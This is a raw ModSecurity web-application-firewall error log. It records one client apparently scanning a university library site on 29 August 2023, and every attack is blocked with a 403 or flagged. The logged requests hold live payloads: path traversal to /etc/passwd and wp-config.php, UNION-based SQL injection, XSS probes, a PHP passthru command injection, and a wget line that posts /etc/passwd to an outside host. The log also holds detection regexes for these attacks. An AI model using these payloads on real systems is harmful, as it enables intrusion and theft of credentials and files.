[Tue Aug 29 11:47:03.458921 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjN0RgAAAAU"]
[Tue Aug 29 11:47:05.390072 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjIhnQAAAAJ"]
[Tue Aug 29 11:47:06.385016 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAhT39sAAAAD"]
[Tue Aug 29 11:47:06.385108 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAhT39sAAAAD"]
[Tue Aug 29 11:47:07.362499 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26ggse5ibua1zibz.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjqDCwAAAAH"]
[Tue Aug 29 11:47:07.727197 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjqDDIAAAAH"]
[Tue Aug 29 11:47:10.447852 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjM7DkAAAAT"]
[Tue Aug 29 11:47:11.443024 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjkM1kAAAAI"]
[Tue Aug 29 11:47:13.373126 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjav0oAAAAV"]
[Tue Aug 29 11:47:14.367829 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjW9CIAAAAA"]
[Tue Aug 29 11:47:15.548110 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjIhoYAAAAJ"]
[Tue Aug 29 11:47:15.933217 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14U8Co-f0AAAj112gAAAAa"]
[Tue Aug 29 11:47:16.367274 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAhui7QAAAAr"]
[Tue Aug 29 11:47:18.507265 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAfECDgAAAAO"]
[Tue Aug 29 11:47:19.424436 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAi@TDAAAAAM"]
[Tue Aug 29 11:47:19.538842 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjcHYkAAAAY"]
[Tue Aug 29 11:47:22.381110 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAj@-uYAAAAI"]
[Tue Aug 29 11:47:23.480493 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjKyxoAAAAQ"]
[Tue Aug 29 11:47:25.384913 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAjIhpYAAAAJ"]
[Tue Aug 29 11:47:25.445658 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjIhpgAAAAJ"]
[Tue Aug 29 11:47:26.365603 2023] [:error] [pid 2303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAj-eTMAAAAE"]
[Tue Aug 29 11:47:27.407926 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAkBKmIAAAAb"]
[Tue Aug 29 11:47:31.427889 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjrbIoAAAAP"]
[Tue Aug 29 11:47:32.833399 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9DwAAAAA"]
[Tue Aug 29 11:47:34.633392 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjCbIEAAAAB"]
[Tue Aug 29 11:47:36.892982 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14aMCo-f0AAAjCbJkAAAAB"]
[Tue Aug 29 11:47:37.436390 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAhui@IAAAAr"]
[Tue Aug 29 11:47:39.408103 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAkNPmEAAAAI"]
[Tue Aug 29 11:47:40.369302 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjdQPoAAAAZ"]
[Tue Aug 29 11:47:40.389045 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjdQPoAAAAZ"]
[Tue Aug 29 11:47:41.621899 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAkNPnEAAAAI"]
[Tue Aug 29 11:47:41.629951 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAkNPnEAAAAI"]
[Tue Aug 29 11:47:41.658897 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bcCo-f0AAAfECFoAAAAO"]
[Tue Aug 29 11:47:42.511345 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAj1178AAAAa"]
[Tue Aug 29 11:47:43.548378 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14b8Co-f0AAAkAL8IAAAAU"]
[Tue Aug 29 11:47:43.755536 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAkNPn0AAAAI"]
[Tue Aug 29 11:47:44.395269 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjrbJYAAAAP"]
